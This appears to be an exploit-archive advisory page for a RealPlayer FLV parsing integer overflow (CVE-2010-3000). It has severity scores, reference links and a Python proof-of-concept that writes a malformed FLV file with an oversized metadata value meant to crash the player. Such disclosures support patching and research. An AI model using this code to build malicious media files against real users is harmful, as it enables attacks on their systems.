RealPlayer 11.1 FLV Parsing Integer Overflow

2010.09.15
Credit: Abysssec
Risk: High
Local: No
Remote: Yes
CWE: CWE-189


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

''' __ __ ____ _ _ ____ | \/ |/ __ \ /\ | | | | _ \ | \ / | | | | / \ | | | | |_) | | |\/| | | | |/ /\ \| | | | _ < | | | | |__| / ____ \ |__| | |_) | |_| |_|\____/_/ \_\____/|____/ ''' ''' Title : RealPlayer FLV Parsing Multiple Integer Overflow Version : RealPlayer SP 1.1.4 Analysis : http://www.abysssec.com Vendor : http://www.real.com Impact : High Contact : shahin [at] abysssec.com , info [at] abysssec.com Twitter : @abysssec CVE : CVE-2010-3000 ''' # POC for CVE-2010-3000 # http://www.exploit-db.com/moaub-13-realplayer-flv-parsing-multiple-integer-overflow/ # http://www.exploit-db.com/sploits/moaub-13-exploit.zip import sys def main(): flvHeader = '\x46\x4C\x56\x01\x05\x00\x00\x00\x09' flvBody1 = '\x00\x00\x00\x00\x12\x00\x00\x15\x00\x00\x00\x00\x00\x00\x00\x02\x00\x0A\x6F\x6E\x4D\x65\x74\x61\x44\x61\x74\x61\x08' HX_FLV_META_AMF_TYPE_MIXEDARRAY_Value = "\x07\x50\x75\x08" # if value >= 0x7507508 --> crash flvBody2 = "\x00\x00\x09\x00\x00\x00\x20" flv = open('poc.flv', 'wb+') flv.write(flvHeader) flv.write(flvBody1) flv.write(HX_FLV_META_AMF_TYPE_MIXEDARRAY_Value) flv.write(flvBody2) flv.close() print '[-] FLV file generated' if __name__ == '__main__': main()

References:

http://xforce.iss.net/xforce/xfdb/61423
http://www.zerodayinitiative.com/advisories/ZDI-10-167
http://www.vupen.com/english/advisories/2010/2216
http://www.securitytracker.com/id?1024370
http://www.securityfocus.com/archive/1/archive/1/513383/100/0/threaded
http://service.real.com/realplayer/security/08262010_player/en/
htt2000
p://secunia.com/advisories/41154
http://secunia.com/advisories/41096


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top